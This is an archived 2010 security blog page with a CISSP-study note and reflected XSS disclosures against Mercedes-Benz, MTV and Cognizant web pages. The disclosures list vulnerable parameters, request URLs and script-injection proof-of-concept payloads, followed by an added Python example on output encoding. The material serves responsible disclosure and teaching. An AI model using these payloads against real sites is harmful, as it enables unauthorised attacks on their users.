Monday, June 21, 2010

An interesting truth about what motivates us!

What Motivates us!
Came across this YouTube video by the guys over at RSAnimate. An awesome animation / presentation on the motivating parameters for an individual and how they differ from the expected norms. A good watch...



Best Regards.

To CISSP Aspirants!

Hi folks,

In June 2009, I cleared the ISC2 CISSP exam and posted my CISSP study plan. Since then, I have continuously been receiving comments and requests, both on my blog post and offline by email, to share the resources I used for my preparation.

Although I have shared the appropriate websites and forum details in my CISSP Study Plan post above, getting study material together still appears challenging to many candidates. Therefore, I've decided to actively support all you CISSP aspirants by directing you to available study resources.

I request everyone: please do not ask me for any exam dumps for CISSP study, because there aren't any. What I am going to try to help you with is the study material you will need in your CISSP preparation.

Please put your request or any concern on my CISSP Study Plan post here http://ipositivesecurity.blogspot.com/2009/06/cissp-my-study-plan.html and I shall try and share the appropriate pointers in this post.

Wish you all the best in your pursuit of the CISSP.

Best Regards.

Sunday, June 20, 2010

Mercedes Benz Cross Site Scripting (XSS)

+++About Mercedes Benz+++
http://en.wikipedia.org/wiki/Mercedes-Benz


+++Affected URL(s)+++
http://www.mercedes-benz.com/


+++Vulnerable Parameter / Function+++
'dsc_wdw'


+++PoC+++
Home Page -> Request Brochure
vuln parameter -> @dsc_wdw


+POST Request+
https://e-services.mercedes-benz.com/Dialog_RQB/RQB;jsessionid=0000fct1dbQH_OtagtCR9h9ZhZj:14k117133?subprocess=RQBc_Cars&locale=en_IN&site_locale=en_IN


+Parameters+
dsc_lnk=sn_step2&dsc_pg=p1302&dsc_wdw='<script>alert("Mercedes.Benz Vuln to XSS")</script>&dsc_lnkapx=&historyBack=true&lastPage=p1302a&p1302.mtxCar%5B0%5D%5B0%5D=car002




Mercedes Benz first notified: January 22, 2010
Second notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.

MTV vulnerable to Cross Site Scripting (XSS)

+++About MTV+++
http://en.wikipedia.org/wiki/MTV


+++Affected URL(s)+++
http://www.mtv.com
http://think.mtv.com


+++Vulnerable Parameter / Function+++
'q'
'search_term'


+++PoC+++
MTV - http://www.mtv.com
http://www.mtv.com/search/?q=<script>alert('xss from search')</script>


Think.MTV - http://think.mtv.com

http://think.mtv.com/Search/TagResults.aspx?search_term=<script>alert('xss from search_term')</script>&filter_by=7&sort_order_type=1&category_ucid=44FDFFFF0002D79CFFFF00000069&time_stamp=








MTV first notified: January 06, 2010
Second notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.

Sunday, June 13, 2010

Cognizant vulnerable to Cross-Site Scripting (XSS)

+++About Cognizant+++
We help transform core processes for greater flexibility, higher efficiency and lower costs. 
http://www.cognizant.com/html/aboutus/about-us.asp

+++Affected URL(s)+++
http://cognizant.com/html/insights/insightslandingpage.asp

-> Case Studies
-> White Papers

+++Vulnerable Parameter / Function+++
'hidPageID'

+++PoC+++

POST Request
-> Case studies
hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=casestudy&hidYear=&hidPageTitle=Case+Studies&hidNavigatingFrom=Insights&hidPageNumber=1

-> White Papers
POST http://cognizant.com/html/insights/insightslandingpage.asp
global_office=%2Fhtml%2Fhome.asp&hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=bluepaper&hidYear=&hidPageTitle=White+Papers&hidNavigatingFrom=Insights&selFilterCriteria=All+white+papers&hidPageNumber=3


Cognizant first notified: February 23, 2010
Second notification: March 29, 2010
Response Received: March 30, 2010
Current Status: Fixed (As of today, June 13, 2010)

Thanks to Nikhilesh Jasuja @Cognizant for his quick response on resolving this issue.

Best Regards.
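
The reports above all involve a request parameter echoed into the response without encoding. As an added example (not code from this blog or from any of the affected sites), the Python below reflects `hidPageID` first verbatim and then HTML-encoded at output time, and audits both pages with a parser. The template, the places where the value is reflected and all function names are assumptions.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed form body; the hidPageID value is the alert() string from the report.
BODY = ("hidPageID=%3Cscript%3Ealert(%22XSS+from+hidPageID%22)%3C%2Fscript%3E"
        "&hidPageTitle=Case+Studies")

# Hypothetical template: the value lands in an attribute and in element text.
TEMPLATE = ('<form><input type="hidden" name="hidPageID" value="{v}"></form>'
            '<p>Page: {v}</p>')

def param(body, name="hidPageID"):
    """Decode one field from an application/x-www-form-urlencoded body."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]

def render_unsafe(body):
    """Reflects the parameter verbatim: the pattern behind reflected XSS."""
    return TEMPLATE.format(v=param(body))

def render_safe(body):
    """Encodes at output time; quote=True also covers the quoted attribute."""
    return TEMPLATE.format(v=escape(param(body), quote=True))

class Audit(HTMLParser):
    """Records the elements, hidden-field value and text a parser sees."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.hidden_value, self.text = [], None, ""

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.hidden_value = dict(attrs).get("value")

    def handle_data(self, data):
        self.text += data

def audit(page):
    parser = Audit()
    parser.feed(page)
    parser.close()
    return parser

if __name__ == "__main__":
    for render in (render_unsafe, render_safe):
        result = audit(render(BODY))
        print(render.__name__, result.tags, repr(result.hidden_value))
```

The same audit works as a regression test: after encoding, the parsed page contains only the template's own elements and the hidden field holds the submitted string unchanged as data.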

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.